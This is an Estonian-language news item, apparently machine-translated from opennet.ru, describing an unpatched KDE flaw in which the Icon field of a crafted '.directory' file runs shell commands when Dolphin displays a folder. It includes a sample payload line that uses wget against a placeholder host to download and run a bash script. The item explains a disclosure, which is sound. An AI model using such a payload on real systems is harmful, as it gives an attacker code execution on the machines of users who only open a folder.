KDE koodi käitamise haavatavus failide loendi vaatamisel

KDE-s tuvastatud haavatavus, mis võimaldab ründajal käivitada suvalisi käske, kui kasutaja vaatab kataloogi või arhiivi, mis sisaldab spetsiaalselt loodud „.desktop” ja „. directory” faile. Rünnak nõuab, et kasutaja lihtsalt vaataks Dolphini failihalduris failide loendit, laadiks alla pahatahtliku töölauafaili või lohistaks otsetee töölauale või dokumenti. Probleem avaldub teekide praeguses väljalaskes KDE raamid 5.60.0 ja vanemad versioonid, kuni KDE 4. Haavatavus on endiselt alles jäänused parandamata (CVE pole määratud).

Probleemi põhjustab klassi KDesktopFile vale rakendamine, mis muutuja “Icon” töötlemisel ilma korraliku põgenemiseta edastab väärtuse funktsioonile KConfigPrivate::expandString(), mis teostab kesta erimärkide laiendamist, sealhulgas töötlemist. stringid “$(..)” käivitatavate käskudena . Vastupidiselt XDG spetsifikatsiooni nõuetele, rakendamine avalikustamine kesta konstruktsioone toodetakse ilma seadistuste tüüpi eraldamata, s.t. mitte ainult käivitatava rakenduse käsurea määramisel, vaid ka vaikimisi kuvatavate ikoonide määramisel.

Näiteks rünnata piisavalt saatke kasutajale ZIP-arhiiv kataloogiga, mis sisaldab ".kataloogi" faili, näiteks:

[Töölaua sisestus] Tüüp = Kataloog
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

Kui proovite Dolphini failihalduris arhiivi sisu vaadata, laaditakse alla ja käivitatakse skript https://example.com/FILENAME.sh.


Allikas: opennet.ru

Lisa kommentaar